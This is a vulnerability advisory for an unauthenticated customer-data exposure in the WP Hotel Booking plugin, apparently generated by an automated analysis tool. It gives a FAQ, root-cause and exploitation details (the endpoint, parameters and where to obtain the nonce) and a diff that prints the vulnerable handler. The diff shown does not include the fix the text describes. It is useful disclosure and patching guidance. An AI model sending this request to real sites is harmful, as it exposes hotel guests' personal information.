What is CVE-2025-14075?

CVE-2025-14075 is a vulnerability in the WP Hotel Booking plugin for WordPress, affecting versions up to and including 2.2.7. It allows unauthenticated users to access sensitive customer information through an AJAX action that lacks proper capability checks.

How does this vulnerability work?

The vulnerability occurs in the ‘hotel_booking_fetch_customer_info’ AJAX action, which can be accessed without authentication. Attackers can send a request with a valid email address and nonce to retrieve sensitive customer data, including personal identifiable information.

Who is affected by this vulnerability?

Any WordPress site using the WP Hotel Booking plugin version 2.2.7 or earlier is affected. Administrators should check their plugin version and assess if they are using the vulnerable version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Hotel Booking plugin installed. If it is version 2.2.7 or earlier, your site is at risk. Additionally, testing for the vulnerability can be done using the proof of concept provided.

How can I fix or mitigate this issue?

To fix this vulnerability, update the WP Hotel Booking plugin to version 2.2.8 or later, where the issue has been patched. Additionally, review your site’s security practices to ensure proper user capability checks are in place.

What does the severity level of 'Medium' mean?

A medium severity level indicates that the vulnerability poses a moderate risk to the affected system. While exploitation requires some knowledge and effort, successful attacks can lead to significant data exposure, necessitating prompt action.

What is the CVSS score for this vulnerability?

The CVSS score for CVE-2025-14075 is 5.3, which reflects a medium severity level. This score helps organizations prioritize their response and remediation efforts based on potential impact.

What are the potential impacts of this vulnerability?

Successful exploitation can lead to unauthorized access to sensitive customer information, including names, addresses, and email addresses. This can result in privacy violations, identity theft, and potential legal issues related to data protection regulations.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable endpoint. It shows the necessary parameters, including a valid nonce, to retrieve customer data without authentication.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately update the plugin to the patched version. Review server logs for unauthorized access attempts and consider notifying affected customers if their data may have been compromised.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing security plugins that monitor for vulnerabilities, enforce strong user authentication, and regularly audit your site for security best practices.

Where can I find more information about this vulnerability?

More information about CVE-2025-14075 can be found in the official CVE database and security advisories from WordPress security experts. Keeping abreast of security updates and best practices is crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14075: WP Hotel Booking <= 2.2.7 – Unauthenticated Sensitive Information Exposure via 'email' Parameter (wp-hotel-booking)

CVE ID CVE-2025-14075

Plugin wp-hotel-booking

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 2.2.7

Patched Version 2.2.8

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14075:
The WP Hotel Booking plugin up to version 2.2.7 contains an unauthenticated sensitive information exposure vulnerability. The plugin’s AJAX handler for fetching customer information lacks proper capability checks, allowing attackers to retrieve PII including full names, addresses, phone numbers, and email addresses by submitting a valid email address and a publicly accessible nonce.

Root Cause:
The vulnerability exists in the `fetch_customer_info()` method within `/wp-hotel-booking/includes/class-wphb-ajax.php`. The function registers the `hotel_booking_fetch_customer_info` AJAX action for both authenticated and unauthenticated users via the `wp_ajax_nopriv_hotel_booking_fetch_customer_info` hook. The function only validates a nonce via `wp_verify_nonce()` but performs no user capability checks. The function queries the `hb_booking` post type using the provided email parameter and returns all associated customer metadata without authorization verification.

Exploitation:
Attackers send a POST request to `/wp-admin/admin-ajax.php` with the following parameters: `action=hotel_booking_fetch_customer_info`, `email=victim@example.com`, and `nonce=[valid_nonce]`. The nonce can be obtained from publicly accessible plugin pages that generate the `hb_booking_nonce_action` nonce. The server responds with a JSON object containing all customer metadata fields from the booking post, including sensitive personal information.

Patch Analysis:
The patch adds a capability check to the `fetch_customer_info()` function. The updated code now requires the current user to have the `manage_hb_booking` capability before processing the request. This restricts the endpoint to administrators and other users with appropriate booking management permissions. The nonce validation remains but now serves as a secondary security measure rather than the primary access control.

Impact:
Successful exploitation allows unauthenticated attackers to retrieve sensitive customer information including full names, physical addresses, phone numbers, and email addresses. This constitutes a privacy violation and potential GDPR compliance issue. The exposed data could facilitate targeted phishing attacks, identity theft, or further social engineering attacks against hotel guests.

Differential between vulnerable and patched code

Code Diff

--- a/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.asset.php
+++ b/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'bdc62b67782a34752e70');
+<?php return array('dependencies' => array(), 'version' => '860310930a02493ba34e');
--- a/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.min.asset.php
+++ b/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.min.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '5481565f3c653226ec4a');
+<?php return array('dependencies' => array(), 'version' => '89254d5edb5ad3927ae8');
--- a/wp-hotel-booking/includes/TemplateHooks/ArchiveRoomTemplate.php
+++ b/wp-hotel-booking/includes/TemplateHooks/ArchiveRoomTemplate.php
@@ -1,313 +1,313 @@
-<?php
-/**
- * Template archive rooms
- *
- * @since 2.1.8
- * @version 1.0.0
- */
-
-namespace WPHBTemplateHooks;
-
-use Exception;
-use WPHBHelpersSingleton;
-use WPHBHelpersTemplate;
-use WPHB_Settings;
-
-class ArchiveRoomTemplate {
-	use Singleton;
-
-	public function init() {
-		add_action( 'wphb/list-rooms/layout', array( $this, 'layout_rooms' ), 10, 1 );
-	}
-
-	public function layout_rooms( $atts = array() ) {
-		try {
-			$rooms_html_wrapper = apply_filters(
-				'wphb/list-rooms/layout/wrapper',
-				array(
-					'<div class="container room-container">' => '</div>',
-				)
-			);
-
-			$rooms_content = static::render_rooms();
-			echo Template::instance()->nest_elements( $rooms_html_wrapper, $rooms_content );
-		} catch ( Exception $e ) {
-			echo 'Error: ' . $e->getMessage();
-		}
-	}
-
-	/**
-	 * Render template list rooms with settings param.
-	 *
-	 *
-	 * @return string
-	 */
-	public static function render_rooms() {
-		global $wp_query;
-		if ( $wp_query->is_tax( 'hb_room_type' ) ) {
-			$room_type = $wp_query->queried_object_id;
-		} else {
-			$room_type = hb_get_request( 'room_type', '' );
-		}
-		$paged = get_query_var( 'paged' ) ?: hb_get_request( 'paged', 1, 'int' );
-		$atts  = array(
-			'check_in_date'  => hb_get_request( 'check_in_date', date( 'Y/m/d' ) ),
-			'check_out_date' => hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) ),
-			'adults'         => hb_get_request( 'adults', 1 ),
-			'max_child'      => hb_get_request( 'max_child', 0 ),
-			'room_qty'       => hb_get_request( 'room_qty', 1 ),
-			'widget_search'  => false,
-			'hb_page'        => $paged,
-			'min_price'      => hb_get_request( 'min_price', 0 ),
-			'max_price'      => hb_get_request( 'max_price', '' ),
-			'rating'         => hb_get_request( 'rating', '' ),
-			'room_type'      => $room_type,
-			'sort_by'        => hb_get_request( 'sort_by', '' ),
-		);
-
-		$results = hb_search_rooms( $atts );
-		$max_num_pages = 0;
-		if ( empty( $results ) || empty( $results['data'] ) ) {
-			$rooms = array();
-			$total = 0;
-			$paged = 1;
-
-			$posts_per_page = (int) apply_filters( 'hb_number_search_rooms_per_page', WPHB_Settings::instance()->get( 'posts_per_page', 8 ) );
-		} else {
-			$rooms = $results['data'];
-			$total = $results['total'];
-			$paged = $results['page'];
-
-			$posts_per_page = $results['posts_per_page'];
-			$max_num_pages  = $results['max_num_pages'];
-		}
-
-		// HTML section rooms.
-		$html_rooms = '';
-
-		ob_start();
-		if ( empty( $rooms ) ) {
-			_e( 'No room found', 'wp-hotel-booking' );
-		} else {
-			hotel_booking_room_loop_start();
-			foreach ($rooms as $room) {
-				global $post;
-				$post = get_post($room->ID);
-				setup_postdata($post);
-				hb_get_template_part( 'content', 'room' );
-			}
-			hotel_booking_room_loop_end();
-			wp_reset_postdata();
-		}
-
-		$html_rooms = ob_get_clean();
-		// end HTML section rooms
-
-		// HTML Sort By
-		$sort_by = hb_get_request( 'sort_by' );
-
-		$data = array(
-			'sort_by' => $sort_by,
-		);
-
-		if ( $total ) {
-			$data['show_number'] = hb_get_show_room_text(
-				array(
-					'paged'         => $paged,
-					'total'         => $total,
-					'item_per_page' => $posts_per_page,
-				)
-			);
-		}
-
-		$sort_by = hb_get_template_content( 'search/v2/sort-by.php', compact( 'data' ) );
-
-		// html pagination
-		$data_pagination = array(
-			'total_pages' => $max_num_pages,
-			'paged'       => $paged,
-		);
-		$html_pagination = static::instance()->html_pagination( $data_pagination );
-
-		// section_rooms
-		$section_rooms = apply_filters(
-			'wbhb/layout/list-rooms/section/rooms',
-			array(
-				'wrapper'     => '<div class="room-content">',
-				'sort_by'     => $sort_by,
-				'rooms'       => $html_rooms,
-				'pagination'  => $html_pagination,
-				'wrapper_end' => '</div>',
-			),
-			$results,
-			$atts
-		);
-
-		// check show filter
-		if ( get_option( 'tp_hotel_booking_filter_price_enable', 1 ) ) {
-			$filter = hb_get_template_content( 'search/v2/search-filter-v2.php', array( 'atts' => array() ) );
-		} else {
-			$filter = '';
-		}
-		$check_room_availability = static::instance()->check_room_availability( $atts );
-		// section ( filter + section_rooms )
-		$section = apply_filters(
-			'wbhb/layout/list-rooms/section',
-			array(
-				'check_availability'  => $check_room_availability,
-				'archive_content'     => '<div>',
-				'filter'              => $filter,
-				'rooms'               => Template::combine_components( $section_rooms ),
-				'archive_content_end' => '</div>',
-			),
-			$rooms,
-			$atts
-		);
-
-		$content = Template::combine_components( $section );
-
-		return $content;
-	}
-
-	/**
-	 * Pagination
-	 * support pagination number
-	 * any support other type pagination add here
-	 *
-	 * @param array $data
-	 *
-	 * @return string
-	 */
-	public function html_pagination( array $data = array() ): string {
-		if ( empty( $data['total_pages'] ) || $data['total_pages'] <= 1 ) {
-			return '';
-		}
-
-		$html_wrapper = array(
-			' <nav class="rooms-pagination">' => '</nav>',
-		);
-
-		$pagination = paginate_links(
-			apply_filters(
-				'hb_pagination_args',
-				array(
-					'base'      => esc_url_raw( str_replace( 999999999, '%#%', get_pagenum_link( 999999999, false ) ) ),
-					'format'    => '',
-					'add_args'  => '',
-					'current'   => max( 1, $data['paged'] ?? 1 ),
-					'total'     => $data[ 'total_pages' ?? 1 ],
-					'prev_text' => __( 'Previous', 'wp-hotel-booking' ),
-					'next_text' => __( 'Next', 'wp-hotel-booking' ),
-					'type'      => 'list',
-					'end_size'  => 3,
-					'mid_size'  => 3,
-				)
-			)
-		);
-
-		return Template::instance()->nest_elements( $html_wrapper, $pagination );
-	}
-
-	public function check_room_availability( $atts ) {
-		$title          = sprintf( '<h3>%s</h3>', __( 'Check avaibility', 'wp-hotel-booking' ) );
-		$check_in_date  = hb_get_request( 'check_in_date', date( 'Y/m/d' ) );
-		$check_out_date = hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) );
-		$adults         = hb_get_request( 'adults', 1 );
-		$max_child      = hb_get_request( 'max_child', 0 );
-		$room_qty       = hb_get_request( 'room_qty', 1 );
-
-		$check_in_date_html  = $this->date_field( __( 'Check-in Date', 'wp-hotel-booking' ), 'check_in_date', $atts['check_in_date'] );
-		$check_out_date_html = $this->date_field( __( 'Check-out Date', 'wp-hotel-booking' ), 'check_out_date', $atts['check_out_date'] );
-		$adults_html         = $this->dropdown_selector(
-			__( 'Adults', 'wp-hotel-booking' ),
-			'adults_capacity',
-			$atts['adults']
-		);
-		$child_html          = $this->dropdown_selector(
-			__( 'Children', 'wp-hotel-booking' ),
-			'max_child',
-			$atts['max_child'],
-			0
-		);
-		$quantity_html       = $this->dropdown_selector(
-			__( 'Rooms', 'wp-hotel-booking' ),
-			'room_qty',
-			$atts['room_qty'],
-		);
-		$button_html         = sprintf( '<div class="hb-form-field-input"><button type="submit" class="rooms-check-avaibility">%s</button></div>', __( 'Check avaibility', 'wp-hotel-booking' ) );
-
-		$sections            = apply_filters(
-			'wbhb/layout/list-rooms/section/check-availability-form',
-			array(
-				'wrapper'         => '<div class="hotel-booking-rooms-search">',
-				'title'           => $title,
-				'form_start'      => '<form name="hb-search-form" class="hb-search-form hb-form-table" >',
-				'check_in_date'   => $check_in_date_html,
-				'check_out_date'  => $check_out_date_html,
-				'adults_capacity' => $adults_html,
-				'child_capacity'  => $child_html,
-				'quantity'        => $quantity_html,
-				'button_search'   => $button_html,
-				'form_end'        => '</form>',
-				'wrapper_end'     => '</div>',
-			),
-			$atts
-		);
-		return Template::combine_components( $sections );
-	}
-
-	public function date_field( $label = '', $name = '', $value = '' ) {
-		$label_html = sprintf( '<label>%s</label>', $label );
-		$input      = sprintf(
-			'<input type="text" name="%1$s" class="hb_input_date_check" value="%2$s" placeholder="%3$s" autocomplete="off"/>',
-			$name,
-			$value,
-			$label
-		);
-		$sections   = array(
-			'wrapper'     => '<div class="hb-form-field-input">',
-			'label'       => $label_html,
-			'input'       => $input,
-			'wrapper_end' => '</div>',
-		);
-		return Template::combine_components( $sections );
-	}
-
-	public function dropdown_selector( $label = '', $name = '', $value = 1, $min = 1 ) {
-
-		$label          = sprintf( '<label>%s</label>', $label );
-		$input_html     = sprintf(
-			'<div class="hb-form-field-input hb-input-field-number">
-		        <input type="number" step="1" min="%1$d" name="%2$s" value="%3$s" />
-		    </div>',
-		    $min, $name, $value
-		);
-		$nav_number_html = sprintf(
-			'<div class="hb-form-field-list nav-number-input-field">
-		        <span class="label">%s</span>
-		        <div class="number-box">
-		            <span class="number-icons hb-goDown"><i class="fa fa-minus"></i></span>
-		            <span class="hb-number-field-value">
-		            </span>
-		            <span class="number-icons hb-goUp"><i class="fa fa-plus"></i></span>
-		        </div>
-		    </div>',
-		    $label
-		);
-
-		$sections = apply_filters(
-			'wbhb/layout/list-rooms/check-availability-form/number-input',
-			array(
-				//sửa sang wrapper này để theme hiển thị dạng +/-
-				// 'wrapper'     => '<div class="hb-form-field hb-form-number hb-form-number-input">',
-				'wrapper'     => '<div class="hb-form-field hb-form-number">',
-				'label'       => $label,
-				'input'       => $input_html,
-				'nav_number'  => $nav_number_html,
-				'wrapper_end' => '</div>',
-			)
-		);
-
-		return Template::combine_components( $sections );
-	}
-}
+<?php
+/**
+ * Template archive rooms
+ *
+ * @since 2.1.8
+ * @version 1.0.0
+ */
+
+namespace WPHBTemplateHooks;
+
+use Exception;
+use WPHBHelpersSingleton;
+use WPHBHelpersTemplate;
+use WPHB_Settings;
+
+class ArchiveRoomTemplate {
+	use Singleton;
+
+	public function init() {
+		add_action( 'wphb/list-rooms/layout', array( $this, 'layout_rooms' ), 10, 1 );
+	}
+
+	public function layout_rooms( $atts = array() ) {
+		try {
+			$rooms_html_wrapper = apply_filters(
+				'wphb/list-rooms/layout/wrapper',
+				array(
+					'<div class="container room-container">' => '</div>',
+				)
+			);
+
+			$rooms_content = static::render_rooms();
+			echo Template::instance()->nest_elements( $rooms_html_wrapper, $rooms_content );
+		} catch ( Exception $e ) {
+			echo 'Error: ' . $e->getMessage();
+		}
+	}
+
+	/**
+	 * Render template list rooms with settings param.
+	 *
+	 *
+	 * @return string
+	 */
+	public static function render_rooms() {
+		global $wp_query;
+		if ( $wp_query->is_tax( 'hb_room_type' ) ) {
+			$room_type = $wp_query->queried_object_id;
+		} else {
+			$room_type = hb_get_request( 'room_type', '' );
+		}
+		$paged = get_query_var( 'paged' ) ?: hb_get_request( 'paged', 1, 'int' );
+		$atts  = array(
+			'check_in_date'  => hb_get_request( 'check_in_date', date( 'Y/m/d' ) ),
+			'check_out_date' => hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) ),
+			'adults'         => hb_get_request( 'adults', 1 ),
+			'max_child'      => hb_get_request( 'max_child', 0 ),
+			'room_qty'       => hb_get_request( 'room_qty', 1 ),
+			'widget_search'  => false,
+			'hb_page'        => $paged,
+			'min_price'      => hb_get_request( 'min_price', 0 ),
+			'max_price'      => hb_get_request( 'max_price', '' ),
+			'rating'         => hb_get_request( 'rating', '' ),
+			'room_type'      => $room_type,
+			'sort_by'        => hb_get_request( 'sort_by', 'date-desc' ),
+		);
+
+		$results = hb_search_rooms( $atts );
+		$max_num_pages = 0;
+		if ( empty( $results ) || empty( $results['data'] ) ) {
+			$rooms = array();
+			$total = 0;
+			$paged = 1;
+
+			$posts_per_page = (int) apply_filters( 'hb_number_search_rooms_per_page', WPHB_Settings::instance()->get( 'posts_per_page', 8 ) );
+		} else {
+			$rooms = $results['data'];
+			$total = $results['total'];
+			$paged = $results['page'];
+
+			$posts_per_page = $results['posts_per_page'];
+			$max_num_pages  = $results['max_num_pages'];
+		}
+
+		// HTML section rooms.
+		$html_rooms = '';
+
+		ob_start();
+		if ( empty( $rooms ) ) {
+			_e( 'No room found', 'wp-hotel-booking' );
+		} else {
+			hotel_booking_room_loop_start();
+			foreach ($rooms as $room) {
+				global $post;
+				$post = get_post($room->ID);
+				setup_postdata($post);
+				hb_get_template_part( 'content', 'room' );
+			}
+			hotel_booking_room_loop_end();
+			wp_reset_postdata();
+		}
+
+		$html_rooms = ob_get_clean();
+		// end HTML section rooms
+
+		// HTML Sort By
+		$sort_by = hb_get_request( 'sort_by' );
+
+		$data = array(
+			'sort_by' => $sort_by,
+		);
+
+		if ( $total ) {
+			$data['show_number'] = hb_get_show_room_text(
+				array(
+					'paged'         => $paged,
+					'total'         => $total,
+					'item_per_page' => $posts_per_page,
+				)
+			);
+		}
+
+		$sort_by = hb_get_template_content( 'search/v2/sort-by.php', compact( 'data' ) );
+
+		// html pagination
+		$data_pagination = array(
+			'total_pages' => $max_num_pages,
+			'paged'       => $paged,
+		);
+		$html_pagination = static::instance()->html_pagination( $data_pagination );
+
+		// section_rooms
+		$section_rooms = apply_filters(
+			'wbhb/layout/list-rooms/section/rooms',
+			array(
+				'wrapper'     => '<div class="room-content">',
+				'sort_by'     => $sort_by,
+				'rooms'       => $html_rooms,
+				'pagination'  => $html_pagination,
+				'wrapper_end' => '</div>',
+			),
+			$results,
+			$atts
+		);
+
+		// check show filter
+		if ( get_option( 'tp_hotel_booking_filter_price_enable', 1 ) ) {
+			$filter = hb_get_template_content( 'search/v2/search-filter-v2.php', array( 'atts' => array() ) );
+		} else {
+			$filter = '';
+		}
+		$check_room_availability = static::instance()->check_room_availability( $atts );
+		// section ( filter + section_rooms )
+		$section = apply_filters(
+			'wbhb/layout/list-rooms/section',
+			array(
+				'check_availability'  => $check_room_availability,
+				'archive_content'     => '<div>',
+				'filter'              => $filter,
+				'rooms'               => Template::combine_components( $section_rooms ),
+				'archive_content_end' => '</div>',
+			),
+			$rooms,
+			$atts
+		);
+
+		$content = Template::combine_components( $section );
+
+		return $content;
+	}
+
+	/**
+	 * Pagination
+	 * support pagination number
+	 * any support other type pagination add here
+	 *
+	 * @param array $data
+	 *
+	 * @return string
+	 */
+	public function html_pagination( array $data = array() ): string {
+		if ( empty( $data['total_pages'] ) || $data['total_pages'] <= 1 ) {
+			return '';
+		}
+
+		$html_wrapper = array(
+			' <nav class="rooms-pagination">' => '</nav>',
+		);
+
+		$pagination = paginate_links(
+			apply_filters(
+				'hb_pagination_args',
+				array(
+					'base'      => esc_url_raw( str_replace( 999999999, '%#%', get_pagenum_link( 999999999, false ) ) ),
+					'format'    => '',
+					'add_args'  => '',
+					'current'   => max( 1, $data['paged'] ?? 1 ),
+					'total'     => $data[ 'total_pages' ?? 1 ],
+					'prev_text' => __( 'Previous', 'wp-hotel-booking' ),
+					'next_text' => __( 'Next', 'wp-hotel-booking' ),
+					'type'      => 'list',
+					'end_size'  => 3,
+					'mid_size'  => 3,
+				)
+			)
+		);
+
+		return Template::instance()->nest_elements( $html_wrapper, $pagination );
+	}
+
+	public function check_room_availability( $atts ) {
+		$title          = sprintf( '<h3>%s</h3>', __( 'Check avaibility', 'wp-hotel-booking' ) );
+		$check_in_date  = hb_get_request( 'check_in_date', date( 'Y/m/d' ) );
+		$check_out_date = hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) );
+		$adults         = hb_get_request( 'adults', 1 );
+		$max_child      = hb_get_request( 'max_child', 0 );
+		$room_qty       = hb_get_request( 'room_qty', 1 );
+
+		$check_in_date_html  = $this->date_field( __( 'Check-in Date', 'wp-hotel-booking' ), 'check_in_date', $atts['check_in_date'] );
+		$check_out_date_html = $this->date_field( __( 'Check-out Date', 'wp-hotel-booking' ), 'check_out_date', $atts['check_out_date'] );
+		$adults_html         = $this->dropdown_selector(
+			__( 'Adults', 'wp-hotel-booking' ),
+			'adults_capacity',
+			$atts['adults']
+		);
+		$child_html          = $this->dropdown_selector(
+			__( 'Children', 'wp-hotel-booking' ),
+			'max_child',
+			$atts['max_child'],
+			0
+		);
+		$quantity_html       = $this->dropdown_selector(
+			__( 'Rooms', 'wp-hotel-booking' ),
+			'room_qty',
+			$atts['room_qty'],
+		);
+		$button_html         = sprintf( '<div class="hb-form-field-input"><button type="submit" class="rooms-check-avaibility">%s</button></div>', __( 'Check avaibility', 'wp-hotel-booking' ) );
+
+		$sections            = apply_filters(
+			'wbhb/layout/list-rooms/section/check-availability-form',
+			array(
+				'wrapper'         => '<div class="hotel-booking-rooms-search">',
+				'title'           => $title,
+				'form_start'      => '<form name="hb-search-form" class="hb-search-form hb-form-table" >',
+				'check_in_date'   => $check_in_date_html,
+				'check_out_date'  => $check_out_date_html,
+				'adults_capacity' => $adults_html,
+				'child_capacity'  => $child_html,
+				'quantity'        => $quantity_html,
+				'button_search'   => $button_html,
+				'form_end'        => '</form>',
+				'wrapper_end'     => '</div>',
+			),
+			$atts
+		);
+		return Template::combine_components( $sections );
+	}
+
+	public function date_field( $label = '', $name = '', $value = '' ) {
+		$label_html = sprintf( '<label>%s</label>', $label );
+		$input      = sprintf(
+			'<input type="text" name="%1$s" class="hb_input_date_check" value="%2$s" placeholder="%3$s" autocomplete="off"/>',
+			$name,
+			$value,
+			$label
+		);
+		$sections   = array(
+			'wrapper'     => '<div class="hb-form-field-input">',
+			'label'       => $label_html,
+			'input'       => $input,
+			'wrapper_end' => '</div>',
+		);
+		return Template::combine_components( $sections );
+	}
+
+	public function dropdown_selector( $label = '', $name = '', $value = 1, $min = 1 ) {
+
+		$label          = sprintf( '<label>%s</label>', $label );
+		$input_html     = sprintf(
+			'<div class="hb-form-field-input hb-input-field-number">
+		        <input type="number" step="1" min="%1$d" name="%2$s" value="%3$s" />
+		    </div>',
+		    $min, $name, $value
+		);
+		$nav_number_html = sprintf(
+			'<div class="hb-form-field-list nav-number-input-field">
+		        <span class="label">%s</span>
+		        <div class="number-box">
+		            <span class="number-icons hb-goDown"><i class="fa fa-minus"></i></span>
+		            <span class="hb-number-field-value">
+		            </span>
+		            <span class="number-icons hb-goUp"><i class="fa fa-plus"></i></span>
+		        </div>
+		    </div>',
+		    $label
+		);
+
+		$sections = apply_filters(
+			'wbhb/layout/list-rooms/check-availability-form/number-input',
+			array(
+				//sửa sang wrapper này để theme hiển thị dạng +/-
+				// 'wrapper'     => '<div class="hb-form-field hb-form-number hb-form-number-input">',
+				'wrapper'     => '<div class="hb-form-field hb-form-number">',
+				'label'       => $label,
+				'input'       => $input_html,
+				'nav_number'  => $nav_number_html,
+				'wrapper_end' => '</div>',
+			)
+		);
+
+		return Template::combine_components( $sections );
+	}
+}
--- a/wp-hotel-booking/includes/class-wphb-ajax.php
+++ b/wp-hotel-booking/includes/class-wphb-ajax.php
@@ -1,919 +1,919 @@
-<?php
-/**
- * WP Hotel Booking ajax.
- *
- * @version       1.9.6
- * @author        ThimPress
- * @package       WP_Hotel_Booking/Classes
- * @category      Classes
- * @author        Thimpress, leehld
- */
-
-/**
- * Prevent loading this file directly
- */
-defined( 'ABSPATH' ) || exit;
-
-/**
- * Class WPHB_Ajax
- */
-class WPHB_Ajax {
-
-	/**
-	 * @var bool
-	 */
-	protected static $_loaded = false;
-
-	/**
-	 * Constructor
-	 */
-	function __construct() {
-		if ( self::$_loaded ) {
-			return;
-		}
-
-		$ajax_actions = array(
-			'fetch_customer_info'      => true,
-			'place_order'              => true,
-			'load_room_type_galley'    => false,
-			'parse_search_params'      => true,
-			'parse_booking_params'     => true,
-			'apply_coupon'             => true,
-			'remove_coupon'            => true,
-			'ajax_add_to_cart'         => true,
-			'add_extra_to_cart'        => true,
-			'ajax_remove_item_cart'    => true,
-			'load_order_user'          => false,
-			'load_room_ajax'           => false,
-			'check_room_available'     => false,
-			'load_order_item'          => false,
-			'load_coupon_ajax'         => false,
-			'admin_add_order_item'     => false,
-			'admin_remove_order_item'  => false,
-			'admin_remove_order_items' => false,
-			'add_coupon_to_order'      => false,
-			'remove_coupon_on_order'   => false,
-			'load_other_full_calendar' => false,
-			'dismiss_notice'           => true,
-			'create_pages'             => false,
-		);
-
-		foreach ( $ajax_actions as $action => $priv ) {
-			add_action( "wp_ajax_hotel_booking_{$action}", array( __CLASS__, $action ) );
-			if ( $priv ) {
-				add_action( "wp_ajax_nopriv_hotel_booking_{$action}", array( __CLASS__, $action ) );
-			}
-		}
-		self::$_loaded = true;
-	}
-
-	/**
-	 * It creates a page
-	 */
-	static function create_pages() {
-		$response = array(
-			'code'    => 0,
-			'message' => '',
-		);
-
-		if ( ! current_user_can( 'edit_pages' ) || empty( $_POST['page_name'] ) ) {
-			$response['message'] = __( 'Request invalid', 'wp-hotel-booking' );
-			hb_send_json( $response );
-		}
-
-		$page_name = WPHB_Helpers::sanitize_params_submitted( $_POST['page_name'] );
-
-		if ( $page_name ) {
-			$args = array(
-				'post_type'   => 'page',
-				'post_title'  => $page_name,
-				'post_status' => 'publish',
-			);
-
-			$page_id = wp_insert_post( $args );
-
-			if ( $page_id ) {
-				$response['code']    = 1;
-				$response['message'] = 'create page success';
-				$response['page']    = get_post( $page_id );
-				$response['html']    = '<a href="' . get_edit_post_link( $page_id ) . '" target="_blank">' . __( 'Edit Page', 'wp-hotel-booking' ) . '</a> ';
-				$response['html']   .= '<a href="' . get_permalink( $page_id ) . '" target="_blank">' . __( 'View Page', 'wp-hotel-booking' ) . '</a>';
-			} else {
-				$response['error'] = __( 'Error! Page creation failed. Please try again.', 'wp-hotel-booking' );
-			}
-		} else {
-			$response['error'] = __( 'Empty page name!', 'wp-hotel-booking' );
-		}
-
-		wp_send_json( $response );
-		die;
-	}
-
-	/**
-	 * Add extra to cart action.
-	 */
-	public static function add_extra_to_cart() {
-
-		if ( ! check_ajax_referer( 'hb_select_extra_nonce_action', 'nonce' ) ) {
-			return;
-		}
-
-		$cart_id = sanitize_text_field( wp_unslash( $_POST['cart_id'] ) );
-		if ( ! $cart_id ) {
-			hb_send_json(
-				array(
-					'status'  => 'warning',
-					'message' => __( 'Cart ID is invalid.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		$cart       = WPHB_Cart::instance();
-		$extra_cart = HB_Extra_Cart::instance();
-		$cart_item  = $cart->get_cart_item( $cart_id );
-
-		if ( isset( $_POST['hb_optional_quantity_selected'] ) ) {
-			$selected  = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity_selected'] );
-			$extra_qty = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity'] );
-
-			foreach ( $selected as $extra_id => $select ) {
-				if ( $select == 'on' && $cart_item ) {
-					$extra_cart->ajax_added_cart(
-						$cart_id,
-						array(
-							'hb_optional_quantity' => array( $extra_id => $extra_qty[ $extra_id ] ),
-							'hb_optional_quantity_selected' => array( $extra_id => 'on' ),
-						),
-					);
-				}
-			}
-		}
-		$cart_url = hb_get_cart_url();
-
-		$pageRedirect = WPHB_Settings::instance()->getPageRedirect();
-
-		if ( $pageRedirect == '' ) {
-			$pageRedirect = $cart_url;
-		}
-
-		hb_send_json(
-			array(
-				'status'   => 'success',
-				'redirect' => $pageRedirect,
-			)
-		);
-	}
-
-
-	/**
-	 * Dismiss remove TP Hotel Booking plugin notice
-	 */
-	static function dismiss_notice() {
-		if ( empty( hb_get_request( 'nonce', false ) )
-			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
-			wp_die();
-		}
-
-		if ( is_multisite() ) {
-			update_site_option( 'wphb_notice_remove_hotel_booking', 1 );
-		} else {
-			update_option( 'wphb_notice_remove_hotel_booking', 1 );
-		}
-		wp_send_json(
-			array(
-				'status' => 'done',
-			)
-		);
-	}
-
-	/**
-	 * Fetch customer information with user email
-	 */
-	static function fetch_customer_info() {
-		if ( empty( hb_get_request( 'nonce', false ) )
-			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
-			die();
-		}
-		$email = hb_get_request( 'email' );
-		$args  = array(
-			'post_type'   => 'hb_booking',
-			'meta_key'    => '_hb_customer_email',
-			'meta_value'  => $email,
-			'post_status' => 'any',
-		);
-		// set_transient( 'hotel_booking_customer_email_' . WPHB_BLOG_ID, $email, DAY_IN_SECONDS );
-		WP_Hotel_Booking::instance()->cart->set_customer( 'customer_email', $email );
-		if ( $posts = get_posts( $args ) ) {
-			$customer       = $posts[0];
-			$customer->data = array();
-			$data           = get_post_meta( $customer->ID );
-			foreach ( $data as $k => $v ) {
-				$customer->data[ $k ] = $v[0];
-			}
-		} else {
-			$customer = null;
-		}
-		hb_send_json( $customer );
-		die();
-	}
-
-	/**
-	 * Process the order with customer information posted via form
-	 *
-	 * @throws Exception
-	 */
-	static function place_order() {
-		hb_customer_place_order();
-	}
-
-	/**
-	 * Get all images for a room type
-	 */
-	static function load_room_type_galley() {
-		$term_id        = hb_get_request( 'term_id' );
-		$attachment_ids = get_option( 'hb_taxonomy_thumbnail_' . $term_id );
-		$attachments    = array();
-		if ( $attachment_ids ) {
-			foreach ( $attachment_ids as $id ) {
-				$attachment    = wp_get_attachment_image_src( $id, 'thumbnail' );
-				$attachments[] = array(
-					'id'  => $id,
-					'src' => $attachment[0],
-				);
-			}
-		}
-		hb_send_json( $attachments );
-	}
-
-	/**
-	 * Catch variables via post method and build a request param
-	 */
